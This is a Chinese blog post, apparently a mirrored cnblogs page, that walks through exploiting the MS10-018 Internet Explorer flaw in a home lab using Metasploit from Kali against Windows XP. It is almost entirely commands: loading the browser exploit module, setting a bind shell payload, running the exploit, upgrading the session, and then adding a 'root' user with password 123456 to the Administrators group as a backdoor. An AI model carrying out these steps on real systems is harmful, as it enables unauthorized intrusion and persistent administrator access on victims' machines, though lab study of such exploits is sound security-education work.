zoukankan      html  css  js  c++  java
  • Metasploits之ms10_018

    漏洞详情:https://technet.microsoft.com/library/security/ms10-018


     一准备:

      1:kali Linux系统  192.168.195.129

      2:Windows XP系统  192.168.195.130

     二:Kali Linux系统操作

    1::msfconsole  启动metsploits
    
    2:search ms10_018  搜索ms10_018
    
    3:use exploit/windows/browser/ms10_018_ie_behaviors  启动ms10_018模块
    

    1:set PAYLOAD windows/shell/bind_tcp        选定并设置攻击载荷
    2:show options    查看所需参数
    

     

    1:set SRVHOST 192.168.195.129(Kali的IP)
    2:set URIPATH ms10_018.html
    3:show options

    1:exploit    尝试攻击

    1:sessions
    2:setg LHOST 192.168.195.129
    3:sessions -u 1
    

    1:sessions -i 1        与ID为1的控制会话进行交互
    2:ipconfig		查看windows系统IP
    3:net user root 123456 /add	添加root用户
    4:net localgroup Administrator root /add	提升root用户权限至Administrator用户组


    参考:http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson11/ 

  • 相关阅读:
    css相关
    文章管理列表
    高性能MySQL基础篇
    mysql
    node.js开发实战
    React Hooks
    client-*,scroll-*,offset-*的区别
    将create-react-app从javascript迁移到typescript
    为Github项目添加Travis持续集成服务
    cookie储存
  • 原文地址:https://www.cnblogs.com/SzSec/p/7238151.html
Copyright © 2011-2022 走看看